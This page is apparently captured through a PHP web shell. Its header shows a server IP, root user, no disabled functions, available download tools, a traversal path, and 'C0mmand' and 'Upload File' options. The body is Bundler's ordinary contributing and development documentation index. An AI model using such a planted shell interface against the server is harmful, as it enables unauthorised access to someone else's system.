|
Server IP : 161.35.85.9 / Your IP : 216.73.216.209 Web Server : nginx/1.30.1 System : Linux cheapdeb-ams3 7.0.9+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 7.0.9-1 (2026-05-22) x86_64 User : root ( 0) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/java/../python3/../python/../python/../java/../doc/python2/../lsof/../bundler/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# Docs: Contributing and developing Bundler _If you're looking for documentation on how to use Bundler: visit [bundler.io](https://bundler.io/), or run `bundle help` from the command line. You may also be interested in [troubleshooting common issues](TROUBLESHOOTING.md) found when using Bundler._ Bundler welcomes contributions from *everyone*. While contributing, please follow the project [code of conduct](https://bundler.io/conduct.html), so that everyone can be included. Maintainers are expected to work together with the community in accordance with [our project policies](POLICIES.md). If you'd like to help make Bundler better, you totally rock! Thanks for helping us make Bundler better. ## Contributing * [Overview & getting started](contributing/README.md) * [How you can help: your first contributions!](contributing/HOW_YOU_CAN_HELP.md) * [Bug triage](contributing/BUG_TRIAGE.md) * [Getting help](https://slack.bundler.io) * [Filing issues](https://github.com/rubygems/rubygems/issues/new?labels=Bundler&template=bundler-related-issue.md) * [Community](contributing/COMMUNITY.md) ## Development * [Overview](development/README.md) * [Development setup](development/SETUP.md) * [Submitting pull requests](development/PULL_REQUESTS.md) * [Adding new features](development/NEW_FEATURES.md) * [Debugging](development/DEBUGGING.md) ## Documentation * [Overview](documentation/README.md) * [Writing docs for man pages](documentation/WRITING.md) * [Documentation vision](documentation/VISION.md) ## Maintainers * [Merging pull requests](playbooks/MERGING_A_PR.md)